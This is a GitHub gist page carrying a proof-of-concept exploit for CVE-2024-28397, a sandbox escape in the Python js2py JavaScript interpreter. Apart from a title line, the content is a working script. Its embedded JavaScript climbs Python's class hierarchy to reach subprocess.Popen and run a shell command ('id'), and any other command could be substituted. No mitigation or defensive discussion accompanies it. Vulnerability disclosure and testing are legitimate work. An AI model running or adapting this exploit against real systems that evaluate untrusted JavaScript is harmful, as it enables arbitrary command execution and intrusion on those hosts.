Skip to content

Instantly share code, notes, and snippets.

@win3zz

win3zz/CVE-2024-28397.md

Created June 19, 2024 13:38
Show Gist options
  • Save win3zz/159610d3269f39f66a4da5ddf5150e2d to your computer and use it in GitHub Desktop.
Save win3zz/159610d3269f39f66a4da5ddf5150e2d to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2024-28397: js2py (JS interpreter) Sandbox Escape, bypassing restrictions to execute commands.
Raw
CVE-2024-28397.md

CVE-2024-28397: js2py (JS interpreter) Sandbox Escape, bypassing restrictions to execute commands.

import js2py

js_code = """

function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}

let obj = Object.getOwnPropertyNames({}).__getattribute__("__getattribute__")("__class__").__base__
output = findpopen(obj)("id", -1, null, -1, -1, -1, null, null, true).communicate()
console.log(output)

"""
repr(js2py.eval_js(js_code))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment